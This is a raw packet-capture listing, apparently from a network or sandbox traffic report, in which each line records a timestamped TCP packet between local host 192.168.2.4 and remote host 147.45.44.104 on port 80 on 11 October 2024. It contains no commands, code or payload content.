                                                                                                                                                      Oct 11, 2024 23:07:02.263333082 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.263341904 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263358116 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263375998 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263396025 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263381958 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.263426065 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263432026 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.263432026 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.263452053 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263465881 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263479948 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263494968 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.263497114 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263513088 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263516903 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.263528109 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263536930 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.263542891 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263557911 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263572931 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263576031 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.263588905 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263596058 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.263633013 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.263742924 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263775110 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263808012 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263823986 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.263840914 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263873100 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263889074 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.263905048 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263937950 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263950109 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.263994932 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.264028072 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.264046907 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.264060020 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.264094114 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.264110088 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.264126062 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.264158010 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.264172077 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.264190912 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.264226913 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.264235973 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.304310083 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.353528976 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.353600979 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.353636026 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.353665113 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.353672028 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.353705883 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.353727102 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.353739023 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.353782892 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.353790045 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.353822947 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.353854895 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.353868008 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.353888035 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.353921890 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.353935003 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.353960037 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.353991985 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.354008913 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.354024887 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.354058981 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.354074001 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.354091883 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.354123116 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.354140997 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.354156971 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.354190111 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.354201078 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.354223013 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.354254961 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.354278088 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.354289055 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.354312897 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.354327917 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.354332924 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.354345083 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.354374886 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.398152113 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.443933010 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.443969965 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.443986893 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.443996906 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444006920 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444024086 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444039106 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444052935 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444067001 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444082022 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444089890 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444103956 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444111109 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.444118023 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444132090 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444147110 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444169998 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444184065 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.444185019 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444184065 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.444199085 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444211960 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.444216967 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444230080 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.444231987 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444247007 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444248915 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.444262028 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444272995 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.444295883 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444312096 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444327116 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444327116 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.444341898 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.444356918 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.444397926 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.533812046 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.533888102 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.533910990 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.533927917 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.533962965 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.533977985 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534013033 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534065008 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534071922 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.534097910 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534127951 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534140110 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.534141064 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.534142971 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534158945 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534173012 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534181118 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.534188032 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534200907 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.534204960 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534219980 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534233093 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.534234047 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534249067 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534260988 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.534262896 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534277916 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534291983 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534293890 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.534307957 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534321070 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.534322023 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534337044 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534353971 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.534357071 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.534379959 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.585652113 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.631114006 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631223917 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631259918 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631282091 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.631294012 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631328106 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631346941 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.631364107 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631422043 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.631436110 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631526947 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631560087 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631572008 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.631592035 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631629944 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631644964 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.631659985 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631691933 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631707907 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.631725073 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631756067 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631771088 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.631788969 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631820917 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631834984 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.631853104 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631885052 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631900072 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.631920099 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631952047 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.631968021 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.631985903 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.632016897 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.632028103 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.632049084 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.632081032 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.632097960 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.632114887 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.632143021 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.632163048 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.679303885 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.721071959 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721143961 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721178055 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721220970 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.721230984 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721265078 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721286058 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.721297979 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721333027 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721344948 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.721385002 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721435070 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721438885 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.721467018 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721498966 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721518040 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.721546888 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721580029 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721596956 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.721611023 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721642971 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721667051 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.721676111 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721708059 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721740961 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721745014 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.721777916 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721801043 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.721811056 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721843958 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721865892 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.721875906 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721908092 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721920967 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.721940041 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721973896 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.721990108 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.722004890 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.722039938 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.722050905 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.773058891 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.807970047 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.808113098 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.808183908 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.810590029 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.810628891 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.810683012 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.810688972 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.810739040 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.810781002 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.810781956 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.810837030 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.810870886 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.810880899 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.810920954 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.810964108 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.810975075 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811007977 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811038017 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811053038 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.811069965 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811119080 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811119080 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.811151028 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811182976 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811193943 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.811217070 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811248064 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811264992 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.811304092 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811336040 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811347008 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.811371088 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811428070 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811430931 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.811460972 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811494112 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811508894 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.811526060 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811558008 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811568975 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.811590910 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811623096 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811631918 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.811655045 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811682940 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811698914 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.811717033 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.811758995 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.894610882 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.894901037 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.895183086 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.901228905 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.901283026 CEST8049730147.45.44.104192.168.2.4
